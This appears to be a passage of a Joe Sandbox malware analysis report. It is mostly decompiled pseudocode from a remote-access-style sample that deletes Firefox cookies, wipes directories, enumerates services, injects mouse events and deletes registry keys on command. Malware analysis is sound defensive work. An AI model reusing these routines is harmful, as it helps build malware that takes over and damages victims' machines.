                                                                      									E00401FA2( &_v52, _t48, _t105, E0040793B(_t68,  &_v76, _t48, _t103, _t106, __eflags, "\\cookies.sqlite"));
                                                                      									E00401F98();
                                                                      									E00401F98();
                                                                      									__eflags = DeleteFileA(E00401F6B( &_v52));
                                                                      									if(__eflags != 0) {
                                                                      										_t98 = _t107 - 0x18;
                                                                      										_push("\n[Firefox cookies found, cleared!]");
                                                                      										goto L2;
                                                                      									} else {
                                                                      										_t60 = GetLastError();
                                                                      										__eflags = _t60 != 0;
                                                                      										if(_t60 != 0) {
                                                                      											FindClose(_t105);
                                                                      											_t69 = 0;
                                                                      										} else {
                                                                      											continue;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						goto L11;
                                                                      					}
                                                                      					E00402053(_t68, _t107 - 0x18, _t101, _t106, "\n[Firefox Cookies not found]");
                                                                      					E0040A863(_t68, _t101, _t106, __eflags);
                                                                      					FindClose(_t105);
                                                                      					goto L10;
                                                                      				} else {
                                                                      					FindClose(_t105);
                                                                      					_t98 = _t107 - 0x18;
                                                                      					_push("\n[Firefox Cookies not found]");
                                                                      					L2:
                                                                      					E00402053(_t68, _t98, _t101, _t106);
                                                                      					E0040A863(_t68, _t101, _t106, _t113);
                                                                      					L10:
                                                                      					_t69 = 1;
                                                                      				}
                                                                      				L11:
                                                                      				E00401F98();
                                                                      				E00401F98();
                                                                      				return _t69;
                                                                      			}


                                                                      APIs
                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040A443
                                                                      • FindClose.KERNEL32(00000000), ref: 0040A45D
                                                                      • FindNextFileA.KERNEL32(00000000,?), ref: 0040A51D
                                                                      • FindClose.KERNEL32(00000000), ref: 0040A543
                                                                      • FindClose.KERNEL32(00000000), ref: 0040A564
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Find$Close$File$FirstNext
                                                                      • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                      • API String ID: 3527384056-432212279
                                                                      • Opcode ID: 73f8cabd20a158d6d28a4cf4a98449d0163523ed5fbe7805c789c52e04fbc39f
                                                                      • Instruction ID: 2636070b19bc4f96a2ba253f04164ebc2b10d63ba6bf9f4624471e1a105ae2bd
                                                                      • Opcode Fuzzy Hash: 73f8cabd20a158d6d28a4cf4a98449d0163523ed5fbe7805c789c52e04fbc39f
                                                                      • Instruction Fuzzy Hash: 89419C3190431A6ACB04F7B1DC5A8EE7768AF51349F54007FF402B60E2FF385A46CA9A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E004187B1(WCHAR* __ecx, void* __edx) {
                                                                      				short _v524;
                                                                      				short _v1044;
                                                                      				struct _WIN32_FIND_DATAW _v1636;
                                                                      				int _t41;
                                                                      				long _t42;
                                                                      				int _t51;
                                                                      				signed int _t60;
                                                                      				void* _t70;
                                                                      				WCHAR* _t71;
                                                                      				void* _t72;
                                                                      
                                                                      				_t70 = __edx;
                                                                      				_t71 = __ecx;
                                                                      				E00439346( &_v1044, __ecx);
                                                                      				E0043DE96( &_v1044, L"\\*");
                                                                      				E00439346( &_v524, _t71);
                                                                      				E0043DE96( &_v524, "\\");
                                                                      				_t72 = FindFirstFileW( &_v1044,  &_v1636);
                                                                      				if(_t72 == 0xffffffff) {
                                                                      					L16:
                                                                      					__eflags = 0;
                                                                      					return 0;
                                                                      				}
                                                                      				E00439346( &_v1044,  &_v524);
                                                                      				_t60 = 1;
                                                                      				do {
                                                                      					_t41 = FindNextFileW(_t72,  &_v1636);
                                                                      					_t76 = _t41;
                                                                      					if(_t41 == 0) {
                                                                      						_t42 = GetLastError();
                                                                      						__eflags = _t42 - 0x12;
                                                                      						if(_t42 != 0x12) {
                                                                      							L15:
                                                                      							FindClose(_t72);
                                                                      							goto L16;
                                                                      						}
                                                                      						_t60 = 0;
                                                                      						__eflags = 0;
                                                                      						goto L13;
                                                                      					}
                                                                      					if(E00418783( &(_v1636.cFileName), _t76) != 0) {
                                                                      						goto L13;
                                                                      					}
                                                                      					E0043DE96( &_v524,  &(_v1636.cFileName));
                                                                      					if((_v1636.dwFileAttributes & 0x00000010) == 0) {
                                                                      						__eflags = _v1636.dwFileAttributes & 0x00000001;
                                                                      						if((_v1636.dwFileAttributes & 0x00000001) != 0) {
                                                                      							SetFileAttributesW( &_v524, 0x80);
                                                                      						}
                                                                      						_t51 = DeleteFileW( &_v524);
                                                                      						__eflags = _t51;
                                                                      						if(_t51 == 0) {
                                                                      							goto L15;
                                                                      						} else {
                                                                      							L10:
                                                                      							E00439346( &_v524,  &_v1044);
                                                                      							goto L13;
                                                                      						}
                                                                      					}
                                                                      					if(E004187B1( &_v524, _t70) == 0) {
                                                                      						goto L15;
                                                                      					}
                                                                      					RemoveDirectoryW( &_v524);
                                                                      					goto L10;
                                                                      					L13:
                                                                      				} while (_t60 != 0);
                                                                      				FindClose(_t72);
                                                                      				return RemoveDirectoryW(_t71);
                                                                      			}

                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,0046E5A0,00000001), ref: 0041880C
                                                                      • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0046E5A0,00000001), ref: 0041883C
                                                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,0046E5A0,00000001), ref: 004188AE
                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,0046E5A0,00000001), ref: 004188BB
                                                                        • Part of subcall function 004187B1: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,0046E5A0,00000001), ref: 00418891
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,0046E5A0,00000001), ref: 004188DC
                                                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,?,0046E5A0,00000001), ref: 004188F2
                                                                      • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,0046E5A0,00000001), ref: 004188F9
                                                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,?,0046E5A0,00000001), ref: 00418902
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                      • String ID: pth_unenc
                                                                      • API String ID: 2341273852-4028850238
                                                                      • Opcode ID: a684b848678f86dc8a92b9bd8f927cf206f938293d51880feeffef5f7a3b709a
                                                                      • Instruction ID: a0eb9dbcb626f7873b29ebf737b5565244f521a17c4af58c68e042bea313a5a1
                                                                      • Opcode Fuzzy Hash: a684b848678f86dc8a92b9bd8f927cf206f938293d51880feeffef5f7a3b709a
                                                                      • Instruction Fuzzy Hash: A931B37280422C9ADB20EBA1DC49EEB73BCAF44309F4406EFF514D2151EF79DAC48A59
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 74%
                                                                      			E00415E25(signed int __edx, void* __eflags, char _a8) {
                                                                      				void* _v28;
                                                                      				char _v32;
                                                                      				void* _v36;
                                                                      				void* _v40;
                                                                      				char _v44;
                                                                      				char _v48;
                                                                      				signed char* _t64;
                                                                      				char* _t65;
                                                                      				signed char* _t66;
                                                                      				intOrPtr* _t71;
                                                                      				intOrPtr* _t76;
                                                                      				intOrPtr* _t78;
                                                                      				intOrPtr* _t83;
                                                                      				intOrPtr* _t85;
                                                                      				char* _t90;
                                                                      				char* _t91;
                                                                      				char* _t92;
                                                                      				intOrPtr* _t93;
                                                                      				signed char* _t95;
                                                                      				char* _t96;
                                                                      				intOrPtr _t98;
                                                                      				signed int _t108;
                                                                      				void* _t111;
                                                                      				signed int _t114;
                                                                      				signed int _t122;
                                                                      				signed int _t131;
                                                                      				signed int _t148;
                                                                      
                                                                      				_t98 =  *((intOrPtr*)(E004051BA(0)));
                                                                      				E00404162( &_a8,  &_v32, 1, 0xffffffff);
                                                                      				if(_t98 != 0x30) {
                                                                      					__eflags = _t98 - 0x31;
                                                                      					if(_t98 != 0x31) {
                                                                      						__eflags = _t98 - 0x32;
                                                                      						if(_t98 != 0x32) {
                                                                      							__eflags = _t98 - 0x33;
                                                                      							if(_t98 != 0x33) {
                                                                      								__eflags = _t98 - 0x34;
                                                                      								if(_t98 != 0x34) {
                                                                      									__eflags = _t98 - 0x35;
                                                                      									if(_t98 != 0x35) {
                                                                      										__eflags = _t98 - 0x36;
                                                                      										if(_t98 != 0x36) {
                                                                      											__eflags = _t98 - 0x37;
                                                                      											if(_t98 == 0x37) {
                                                                      												_t64 = E004051BA(2);
                                                                      												_t65 = E004051BA(1);
                                                                      												_t66 = E004051BA(0);
                                                                      												_t108 =  *_t64 & 0x000000ff;
                                                                      												__eflags =  *_t65;
                                                                      												_push(_t108);
                                                                      												_t55 =  *_t65 != 0;
                                                                      												__eflags = _t55;
                                                                      												_push((_t108 & 0xffffff00 | _t55) & 0x000000ff);
                                                                      												_t111 = 0x46ea50;
                                                                      												goto L18;
                                                                      											}
                                                                      										} else {
                                                                      											_push(0);
                                                                      											_push(0x78);
                                                                      											goto L15;
                                                                      										}
                                                                      									} else {
                                                                      										_push(0);
                                                                      										_push(0xffffff88);
                                                                      										L15:
                                                                      										mouse_event(0x800, 0, 0, ??, ??);
                                                                      									}
                                                                      								} else {
                                                                      									_v40 =  *((intOrPtr*)(E004051BA(0)));
                                                                      									_t71 = E004051BA(4);
                                                                      									_t114 =  *0x46de68; // 0x0
                                                                      									_v40 =  *_t71;
                                                                      									E00415CC4( *((intOrPtr*)(0x46dd68 + _t114 * 4)),  &_v44, __eflags,  &_v40);
                                                                      									E0041614C(_v44, _v40);
                                                                      								}
                                                                      							} else {
                                                                      								_t76 = E004051BA(0);
                                                                      								_v44 =  *((intOrPtr*)(E004051BA(4)));
                                                                      								_t78 = E004051BA(8);
                                                                      								_t122 =  *0x46de68; // 0x0
                                                                      								_v44 =  *_t78;
                                                                      								E00415CC4( *((intOrPtr*)(0x46dd68 + _t122 * 4)),  &_v48, __eflags,  &_v44);
                                                                      								E004160E9( *_t76, _v48, _v44);
                                                                      								goto L8;
                                                                      							}
                                                                      						} else {
                                                                      							_t83 = E004051BA(0);
                                                                      							_v40 =  *((intOrPtr*)(E004051BA(4)));
                                                                      							_t85 = E004051BA(8);
                                                                      							_t131 =  *0x46de68; // 0x0
                                                                      							_v48 =  *_t85;
                                                                      							E00415CC4( *((intOrPtr*)(0x46dd68 + _t131 * 4)),  &_v44, __eflags,  &_v48);
                                                                      							E00416086( *_t83, _v44, _v48);
                                                                      							goto L8;
                                                                      						}
                                                                      					} else {
                                                                      						_t90 = E004051BA(4);
                                                                      						_t91 = E004051BA(3);
                                                                      						_t92 = E004051BA(2);
                                                                      						_t93 = E004051BA(0);
                                                                      						 *_t90 =  *_t91;
                                                                      						__eflags =  *_t92;
                                                                      						E0041618D( *_t93, __edx & 0xffffff00 |  *_t92 != 0x00000000, (( &_v40 & 0xffffff00 |  *_t90 != 0x00000000) & 0 |  *_t91 != 0x00000000) & 0x000000ff, ( &_v40 & 0xffffff00 |  *_t90 != 0x00000000) & 0x000000ff);
                                                                      						L8:
                                                                      					}
                                                                      				} else {
                                                                      					_t95 = E004051BA(2);
                                                                      					_t96 = E004051BA(1);
                                                                      					_t66 = E004051BA(0);
                                                                      					_t148 =  *_t95 & 0x000000ff;
                                                                      					_t177 =  *_t96;
                                                                      					_push(_t148);
                                                                      					_push((_t148 & 0xffffff00 |  *_t96 != 0x00000000) & 0x000000ff);
                                                                      					_t111 = 0x46e998;
                                                                      					L18:
                                                                      					_push( *_t66 & 0x000000ff);
                                                                      					E00415388(_t111, _t177);
                                                                      				}
                                                                      				E00401F98();
                                                                      				E00401F98();
                                                                      				return 0;
                                                                      			}

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0$1$2$3$4$5$6$7
                                                                      • API String ID: 0-3177665633
                                                                      • Opcode ID: 03473a701112d158429d20a5b3fa9ecc28fe072575c94d482568d119f3c302fb
                                                                      • Instruction ID: ce3f6f530eaf373da6f57d2a16164b96a2751c958d23b8e0be05e5def7443d4d
                                                                      • Opcode Fuzzy Hash: 03473a701112d158429d20a5b3fa9ecc28fe072575c94d482568d119f3c302fb
                                                                      • Instruction Fuzzy Hash: 206114709093019FE714EF20D891BEB77A5EF94310F04481EF5926B2D1EB389949CB9A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 95%
                                                                      			E00416FC6(void* __ecx, void* __edx) {
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __ebp;
                                                                      				void* _t100;
                                                                      				void* _t107;
                                                                      				int _t108;
                                                                      				long _t110;
                                                                      				void* _t133;
                                                                      				void* _t194;
                                                                      				short** _t195;
                                                                      				int _t196;
                                                                      				struct _ENUM_SERVICE_STATUS* _t197;
                                                                      				int _t198;
                                                                      				struct _QUERY_SERVICE_CONFIG* _t201;
                                                                      				void* _t202;
                                                                      
                                                                      				_t185 = __edx;
                                                                      				_t200 = 0;
                                                                      				_t194 = __ecx;
                                                                      				 *((intOrPtr*)(_t202 + 0x3c)) = __ecx;
                                                                      				_t133 = OpenSCManagerA(0, 0, 4);
                                                                      				if(_t133 != 0) {
                                                                      					_t135 = _t202 + 0x4c;
                                                                      					E00401F46(_t133, _t202 + 0x4c);
                                                                      					 *(_t202 + 0x18) = 0;
                                                                      					 *(_t202 + 0x18) = 0;
                                                                      					 *(_t202 + 0x28) = 0;
                                                                      					__eflags = EnumServicesStatusW(_t133, 0x3b, 3, _t202 + 0xa4, 0, _t202 + 0x20, _t202 + 0x18, _t202 + 0x20);
                                                                      					if(__eflags != 0) {
                                                                      						L12:
                                                                      						CloseServiceHandle(_t133);
                                                                      						E00403222(_t133, _t194, _t200, __eflags, _t202 + 0x4c);
                                                                      						E00401EC9();
                                                                      						L13:
                                                                      						return _t194;
                                                                      					}
                                                                      					__eflags = GetLastError() - 0xea;
                                                                      					if(__eflags != 0) {
                                                                      						goto L12;
                                                                      					}
                                                                      					_t196 =  *(_t202 + 0x18);
                                                                      					_push(_t196);
                                                                      					_t200 = E00438691(_t135);
                                                                      					 *(_t202 + 0x30) = _t200;
                                                                      					EnumServicesStatusW(_t133, 0x3b, 3, _t200, _t196, _t202 + 0x20, _t202 + 0x18, _t202 + 0x20);
                                                                      					_t197 = 0;
                                                                      					 *(_t202 + 0x28) = 0;
                                                                      					__eflags =  *(_t202 + 0x14);
                                                                      					if(__eflags <= 0) {
                                                                      						L11:
                                                                      						L0043868C(_t200);
                                                                      						goto L12;
                                                                      					}
                                                                      					_t195 = _t200;
                                                                      					_t201 =  *(_t202 + 0x2c);
                                                                      					do {
                                                                      						E0040321D(E004042BC(_t133, _t202 + 0x64, _t195[1], _t201, __eflags, E0040413E(_t133, _t202 + 0x38, _t185, _t201, 0x467488)));
                                                                      						E00401EC9();
                                                                      						E00401EC9();
                                                                      						E0040321D(E004042BC(_t133, _t202 + 0x34,  *_t195, _t201, __eflags, E0040413E(_t133, _t202 + 0x68, _t195[1], _t201, 0x467488)));
                                                                      						E00401EC9();
                                                                      						E00401EC9();
                                                                      						_t100 = E0040413E(_t133, _t202 + 0x80,  *_t195, _t201, 0x467488);
                                                                      						_t185 = E0041834A(_t133, _t202 + 0x64, _t195[3]);
                                                                      						E0040321D(E00402F65(_t202 + 0x38, _t101, _t100));
                                                                      						E00401EC9();
                                                                      						E00401EC9();
                                                                      						E00401EC9();
                                                                      						 *(_t202 + 0x1c) =  *(_t202 + 0x1c) & 0x00000000;
                                                                      						_t107 = OpenServiceW(_t133,  *_t195, 1);
                                                                      						_t160 = _t202 + 0x1c;
                                                                      						 *(_t202 + 0x24) = _t107;
                                                                      						_t108 = QueryServiceConfigW(_t107, _t201, 0, _t202 + 0x1c);
                                                                      						__eflags = _t108;
                                                                      						if(_t108 == 0) {
                                                                      							_t110 = GetLastError();
                                                                      							__eflags = _t110 - 0x7a;
                                                                      							if(_t110 == 0x7a) {
                                                                      								_t198 =  *(_t202 + 0x1c);
                                                                      								_push(_t198);
                                                                      								_t201 = E00438691(_t160);
                                                                      								QueryServiceConfigW( *(_t202 + 0x30), _t201, _t198, _t202 + 0x1c);
                                                                      								E0040321D(E00402FD4(_t133, _t202 + 0x80, E0041834A(_t133, _t202 + 0x34,  *_t201), _t195, _t201, __eflags, 0x467488));
                                                                      								E00401EC9();
                                                                      								E00401EC9();
                                                                      								E0040321D(E00402FD4(_t133, _t202 + 0x80, E0041834A(_t133, _t202 + 0x34,  *((intOrPtr*)(_t201 + 4))), _t195, _t201, __eflags, 0x467488));
                                                                      								E00401EC9();
                                                                      								E00401EC9();
                                                                      								_t185 = E004042BC(_t133, _t202 + 0x38,  *((intOrPtr*)(_t201 + 0xc)), _t201, __eflags, E0040413E(_t133, _t202 + 0x6c, _t119, _t201, 0x467488));
                                                                      								E0040321D(E00402FD4(_t133, _t202 + 0x80, _t125, _t195, _t201, __eflags, "\n"));
                                                                      								E00401EC9();
                                                                      								E00401EC9();
                                                                      								E00401EC9();
                                                                      								L0043868C(_t201);
                                                                      								_t197 =  *(_t202 + 0x2c);
                                                                      							}
                                                                      						}
                                                                      						CloseServiceHandle( *(_t202 + 0x24));
                                                                      						_t197 = _t197 + 1;
                                                                      						_t195 =  &(_t195[9]);
                                                                      						 *(_t202 + 0x28) = _t197;
                                                                      						__eflags = _t197 -  *(_t202 + 0x14);
                                                                      					} while (__eflags < 0);
                                                                      					_t194 =  *(_t202 + 0x30);
                                                                      					_t200 =  *(_t202 + 0x2c);
                                                                      					goto L11;
                                                                      				}
                                                                      				E0040413E(_t133, _t194, _t185, 0, 0x4610ec);
                                                                      				goto L13;
                                                                      			}

                                                                      APIs
                                                                      • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,0046EB98), ref: 00416FDC
                                                                      • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041702B
                                                                      • GetLastError.KERNEL32 ref: 00417039
                                                                      • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 00417071
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                      • String ID:
                                                                      • API String ID: 3587775597-0
                                                                      • Opcode ID: 8daae44d17b1695c0b0492279e758a85ce211f53b716cad71d96ed8095f55e8f
                                                                      • Instruction ID: bcdc87649b27bac0c2f48e017d66e6b1fe96cd9cd216ae4fb69fdb74765f6596
                                                                      • Opcode Fuzzy Hash: 8daae44d17b1695c0b0492279e758a85ce211f53b716cad71d96ed8095f55e8f
                                                                      • Instruction Fuzzy Hash: 918181711083449BC304EB61DC859AFB7ECFF94709F50092EF581561A2EF78EA46CB9A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 81%
                                                                      			E00411466(void* __edx, void* __eflags, char _a8) {
                                                                      				char _v36;
                                                                      				char _v48;
                                                                      				char _v52;
                                                                      				void* _v60;
                                                                      				char _v68;
                                                                      				char _v76;
                                                                      				char _v80;
                                                                      				char _v84;
                                                                      				char _v88;
                                                                      				char _v92;
                                                                      				char _v96;
                                                                      				char _v100;
                                                                      				char _v104;
                                                                      				char _v108;
                                                                      				struct _SECURITY_ATTRIBUTES _v112;
                                                                      				void* _v120;
                                                                      				char _v128;
                                                                      				void* __ebx;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				intOrPtr* _t75;
                                                                      				void* _t86;
                                                                      				void* _t97;
                                                                      				void* _t99;
                                                                      				void* _t100;
                                                                      				void* _t102;
                                                                      				void* _t103;
                                                                      				void* _t111;
                                                                      				void* _t118;
                                                                      				void* _t119;
                                                                      				void* _t121;
                                                                      				void* _t125;
                                                                      				void* _t130;
                                                                      				void* _t136;
                                                                      				void* _t140;
                                                                      				void* _t145;
                                                                      				void* _t151;
                                                                      				void* _t153;
                                                                      				void* _t154;
                                                                      				void* _t156;
                                                                      				void* _t157;
                                                                      				void* _t163;
                                                                      				void* _t165;
                                                                      				void* _t166;
                                                                      				void* _t168;
                                                                      				void* _t174;
                                                                      				void* _t176;
                                                                      				void* _t177;
                                                                      				void* _t179;
                                                                      				void* _t184;
                                                                      				void* _t185;
                                                                      				long _t188;
                                                                      				void* _t195;
                                                                      				void* _t207;
                                                                      				void* _t209;
                                                                      				void* _t220;
                                                                      				void* _t236;
                                                                      				void* _t250;
                                                                      				signed int _t327;
                                                                      				void* _t330;
                                                                      				void* _t332;
                                                                      				void* _t337;
                                                                      				void* _t339;
                                                                      				void* _t341;
                                                                      				signed int _t342;
                                                                      				void* _t344;
                                                                      				void* _t351;
                                                                      				signed int _t352;
                                                                      				void* _t355;
                                                                      				void* _t356;
                                                                      				void* _t357;
                                                                      				void* _t360;
                                                                      				void* _t365;
                                                                      				void* _t366;
                                                                      				void* _t368;
                                                                      				void* _t369;
                                                                      				void* _t371;
                                                                      				void* _t373;
                                                                      				void* _t374;
                                                                      				void* _t376;
                                                                      				void* _t378;
                                                                      				void* _t380;
                                                                      				void* _t385;
                                                                      
                                                                      				_t385 = __eflags;
                                                                      				_t325 = __edx;
                                                                      				_push(_t207);
                                                                      				_t75 = E00401F6B( &_a8);
                                                                      				_push(0xffffffff);
                                                                      				_t330 = 4;
                                                                      				_push(_t330);
                                                                      				_push( &_v52);
                                                                      				E00404162( &_a8);
                                                                      				_t355 = (_t352 & 0xfffffff8) - 0x4c;
                                                                      				E004020B6(_t207, _t355, __edx, _t385, 0x46e260);
                                                                      				_t356 = _t355 - 0x18;
                                                                      				E004020B6(_t207, _t356, __edx, _t385,  &_v68);
                                                                      				E0041851D( &_v108, __edx);
                                                                      				_t357 = _t356 + 0x30;
                                                                      				_t337 =  *_t75 - 0x35;
                                                                      				if(_t337 == 0) {
                                                                      					E00401F46(_t207,  &_v76);
                                                                      					__eflags = E004021BA( &_v88) - 1;
                                                                      					if(__eflags > 0) {
                                                                      						L00409F8A(_t207,  &_v80, _t325, E00401F6B(E00401E25( &_v88, _t325, _t351, __eflags, 1)));
                                                                      					}
                                                                      					E004020B6(_t207, _t357 - 0x18, _t325, __eflags, E00401E25( &_v88, _t325, _t351, __eflags, 0));
                                                                      					_t86 = E00401EC4( &_v84);
                                                                      					_t325 = 1;
                                                                      					_t220 = _t86;
                                                                      					L33:
                                                                      					E00411281(_t220, _t325, _t392);
                                                                      					L34:
                                                                      					E00401EC9();
                                                                      					L35:
                                                                      					E00401E4D( &_v88, _t325);
                                                                      					E00401F98();
                                                                      					E00401F98();
                                                                      					return 0;
                                                                      				}
                                                                      				_t339 = _t337 - 1;
                                                                      				if(_t339 == 0) {
                                                                      					_t97 = E00401F6B(E00401E25( &_v88, __edx, _t351, __eflags, 2));
                                                                      					_t99 = E00401F6B(E00401E25( &_v92, __edx, _t351, __eflags, 1));
                                                                      					_t332 = 0;
                                                                      					_t100 = E00401E25( &_v96, __edx, _t351, __eflags, 0);
                                                                      					_t360 = _t357 - 0x18;
                                                                      					E004020B6(_t207, _t360, _t325, __eflags, _t100);
                                                                      					_t102 = E004111F0(_t207, __eflags, _t97);
                                                                      					_t325 = _t99;
                                                                      					_t103 = E00410F97(_t102, _t99);
                                                                      					_t362 = _t360 + 0x18 - 0x18;
                                                                      					_t236 = _t360 + 0x18 - 0x18;
                                                                      					__eflags = _t103;
                                                                      					if(__eflags == 0) {
                                                                      						_push("2");
                                                                      						L29:
                                                                      						E00402053(_t207, _t236, _t325, _t351);
                                                                      						E00404A78(0x46e7b8, _t325, __eflags);
                                                                      						goto L35;
                                                                      					}
                                                                      					_push("1");
                                                                      					L18:
                                                                      					E00402053(_t207, _t236, _t325, _t351);
                                                                      					E00404A78(0x46e7b8, _t325, __eflags);
                                                                      					E004020B6(_t207, _t362 - 0x18, _t325, __eflags, E00401E25( &_v120, _t325, _t351, __eflags, _t332));
                                                                      					_t111 = E00401F6B(E00401E25( &_v128, _t325, _t351, __eflags, 1));
                                                                      					_t325 = 0;
                                                                      					E00411281(_t111, 0, __eflags);
                                                                      					goto L35;
                                                                      				}
                                                                      				_t341 = _t339 - 1;
                                                                      				if(_t341 == 0) {
                                                                      					E0040413E(_t207,  &_v80, __edx, _t351, E00401F6B(E00401E25( &_v88, __edx, _t351, __eflags, 1)));
                                                                      					 *0x46dd5c = GetProcAddress(LoadLibraryA("Shlwapi.dll"), "SHDeleteKeyW");
                                                                      					_t118 = E00401EC4( &_v84);
                                                                      					_t119 = E00401E25( &_v96, _t325, _t351, __eflags, 0);
                                                                      					_t365 = _t357 - 0x18;
                                                                      					E004020B6(_t207, _t365, _t325, __eflags, _t119);
                                                                      					_t121 = E004111F0(_t207, __eflags, _t118);
                                                                      					_t366 = _t365 + 0x18;
                                                                      					__eflags =  *0x46dd5c(_t121);
                                                                      					if(__eflags != 0) {
                                                                      						_t250 = _t366 - 0x18;
                                                                      						_push("9");
                                                                      					} else {
                                                                      						_t125 = E0040243C();
                                                                      						_t342 = 2;
                                                                      						_t207 = E00411A9D( &_v84, "\\", _t125 - _t342);
                                                                      						__eflags = _t207 - 0xffffffff;
                                                                      						if(__eflags != 0) {
                                                                      							_t51 = _t207 + 1; // 0x1
                                                                      							_t130 = E004310E6( ~0x00BADBAD | _t51 * _t342, _t51 * _t342 >> 0x20, _t342, __eflags);
                                                                      							E00439346(_t130, E00401EC4(E004076F1( &_v84,  &_v36, 0, _t207)));
                                                                      							E00401EC9();
                                                                      							_t136 = E00401E25( &_v108, _t51 * _t342 >> 0x20, _t351, __eflags, 0);
                                                                      							_t368 = _t366 - 0x18;
                                                                      							E004020B6(_t207, _t368, _t51 * _t342 >> 0x20, __eflags, _t136);
                                                                      							_t325 = 0;
                                                                      							__eflags = 0;
                                                                      							E00411281(_t130, 0, 0,  ~0x00BADBAD | _t51 * _t342);
                                                                      							E004310EF(_t130);
                                                                      							_t369 = _t368 + 0x1c;
                                                                      						} else {
                                                                      							_t140 = E00401E25( &_v96, _t325, _t351, __eflags, 0);
                                                                      							_t371 = _t366 - 0x18;
                                                                      							E004020B6(_t207, _t371, _t325, __eflags, _t140);
                                                                      							_t325 = 0;
                                                                      							E00411281(0, 0, __eflags);
                                                                      							_t369 = _t371 + 0x18;
                                                                      						}
                                                                      						_t250 = _t369 - 0x18;
                                                                      						_push("8");
                                                                      					}
                                                                      					L10:
                                                                      					E00402053(_t207, _t250, _t325, _t351);
                                                                      					E00404A78(0x46e7b8, _t325, __eflags);
                                                                      					goto L34;
                                                                      				}
                                                                      				_t344 = _t341 - 1;
                                                                      				if(_t344 == 0) {
                                                                      					_t145 = E004383EC(_t143, E00401F6B(E00401E25( &_v88, __edx, _t351, __eflags, 3)));
                                                                      					__eflags = _t145 - _t330;
                                                                      					if(__eflags == 0) {
                                                                      						E00433220( &_v108, E00401F6B(E00401E25( &_v92, __edx, _t351, __eflags, _t330)), _t330);
                                                                      						_push(_v108);
                                                                      						_t151 = E00401F6B(E00401E25( &_v92, _t325, _t351, __eflags, 2));
                                                                      						_t153 = E00401F6B(E00401E25( &_v96, _t325, _t351, __eflags, 1));
                                                                      						_t332 = 0;
                                                                      						__eflags = 0;
                                                                      						_t154 = E00401E25( &_v100, _t325, _t351, 0, 0);
                                                                      						_t373 = _t357 + 0xc - 0x18;
                                                                      						E004020B6(_t207, _t373, _t325, __eflags, _t154);
                                                                      						_t156 = E004111F0(_t207, __eflags, _t151);
                                                                      						_t374 = _t373 + 0x18;
                                                                      						_t325 = _t153;
                                                                      						_t157 = E00410E33(_t156, _t153);
                                                                      					} else {
                                                                      						__eflags = _t145 - 0xb;
                                                                      						if(__eflags == 0) {
                                                                      							E00433220( &_v104, E00401F6B(E00401E25( &_v92, __edx, _t351, __eflags, _t330)), 8);
                                                                      							_t163 = E00401F6B(E00401E25( &_v92, _t325, _t351, __eflags, 2));
                                                                      							_t165 = E00401F6B(E00401E25( &_v96, _t325, _t351, __eflags, 1));
                                                                      							_t332 = 0;
                                                                      							_t166 = E00401E25( &_v100, _t325, _t351, __eflags, 0);
                                                                      							_t376 = _t357 + 0xc - 0x18;
                                                                      							E004020B6(_t207, _t376, _t325, __eflags, _t166);
                                                                      							_t168 = E004111F0(_t207, __eflags, _t163);
                                                                      							_t325 = _t165;
                                                                      							_t157 = E00410E77(_t168, _t165, _v104, _v100);
                                                                      							_t374 = _t376 + 0x24;
                                                                      						} else {
                                                                      							_push(_t145);
                                                                      							E00401E25( &_v92, __edx, _t351, __eflags, _t330);
                                                                      							_push(E0040243C());
